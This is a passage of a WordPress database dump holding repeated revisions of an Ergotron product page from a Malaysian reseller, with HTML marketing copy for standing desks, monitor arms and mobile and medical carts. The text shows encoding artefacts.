WorkFit-TL, Standing Desk Workstation</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n        <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n        <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\n        </td>\n        <td>\n          This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h1>Mounts</h1>\n  Improve your workflow: Mount a monitor, multiple displays, laptop or keyboard.\n\n  <h3>1. LX Desk Monitor Arm</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>2.Â LX Dual Stacking Arm</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\n        </td>\n        <td>\n          Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>3.Â LX Wall Monitor Arm</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\n        </td>\n        <td>\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h2>Product Benefits</h2>\n  <ul>\n   	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\n   	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\n   	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\n   	<li>Cable management feature routes cables under the arm, out of the way</li>\n   	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\n  </ul>\n\n  &nbsp;\n  <h1>Mobile Carts</h1>\n  Personalize an AV, computer or laptop cart to suit your workflow requirements.\n\n  &nbsp;\n  <h2>1. Mobile Workstations</h2>\n\n  &nbsp;\n  <h3>1. WorkFit-C, Single LD Sit-Stand Workstation</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" />\n        </td>\n        <td>\n          This computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>2.Â WorkFit-C, Dual Sit-Stand Workstation</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          This innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>3.Â Neo-FlexÂ® Laptop Cart</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" />\n        </td>\n        <td>\n          This secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h1>Medical Carts</h1>\n\n  &nbsp;\n  <h3>1.Â StyleViewÂ® Laptop Cart, SV40</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          Incredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, Powered</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          Expand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>3.Â StyleViewÂ® Telemedicine Cart, Powered</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          The modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  &nbsp;\n  <h3>4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)</h3>\n  <table width=\"100%\" border=\"1\">\n    <tbody>\n      <tr height=\"280px\">\n        <td width=\"25%\" align=\"center\">\n          <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\"/>\n        </td>\n        <td>\n          The ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\n        </td>\n      </tr>\n    </tbody>\n  </table>\n\n  To discover more, please click the button below or contact us to discuss your needs.\n\n<center>[maxbutton id=\"1\" ]','Ergotron','','inherit','closed','closed','','1483-autosave-v1','','','2019-09-26 16:43:15','2019-09-26 08:43:15','',1483,'https://bintara.com.my/blog/2018/12/15/1483-autosave-v1/',0,'revision','',0),(3528,1,'2019-09-26 15:49:55','2019-09-26 07:49:55','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" />\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:49:55','2019-09-26 07:49:55','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3527,1,'2019-09-26 15:49:11','2019-09-26 07:49:11','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<table width=\"100%\" border=\"0\">\r\n  <tbody>\r\n    <tr>\r\n      <td colspan=\"2\"><h3>1. WorkFit-Z Mini</h3></td>\r\n    </tr>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" />\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:49:11','2019-09-26 07:49:11','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(2486,1,'2018-12-18 23:00:18','2018-12-18 15:00:18','','WorkFit-Z Mini','','inherit','closed','closed','','workfit-z-mini','','','2018-12-18 23:00:18','2018-12-18 15:00:18','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg',0,'attachment','image/jpeg',0),(2487,1,'2018-12-18 23:00:57','2018-12-18 15:00:57','','WorkFit-TL, Standing Desk Workstation','','inherit','closed','closed','','workfit-tl-standing-desk-workstation','','','2018-12-18 23:00:57','2018-12-18 15:00:57','',1483,'https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg',0,'attachment','image/jpeg',0),(3521,1,'2019-09-26 15:33:20','2019-09-26 07:33:20','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:33:20','2019-09-26 07:33:20','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3529,1,'2019-09-26 15:50:36','2019-09-26 07:50:36','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table border=\"1\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td><img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"118\" height=\"118\" /></td>\r\n<td>Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.</td>\r\n</tr>\r\n</tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:50:36','2019-09-26 07:50:36','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3525,1,'2019-09-26 15:42:41','2019-09-26 07:42:41','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table>\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:42:41','2019-09-26 07:42:41','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3522,1,'2019-09-26 15:39:55','2019-09-26 07:39:55','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr>\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" />\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:39:55','2019-09-26 07:39:55','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3524,1,'2019-09-26 15:41:48','2019-09-26 07:41:48','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:41:48','2019-09-26 07:41:48','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3523,1,'2019-09-26 15:41:04','2019-09-26 07:41:04','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" />\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:41:04','2019-09-26 07:41:04','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3520,1,'2019-09-26 15:29:29','2019-09-26 07:29:29','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, 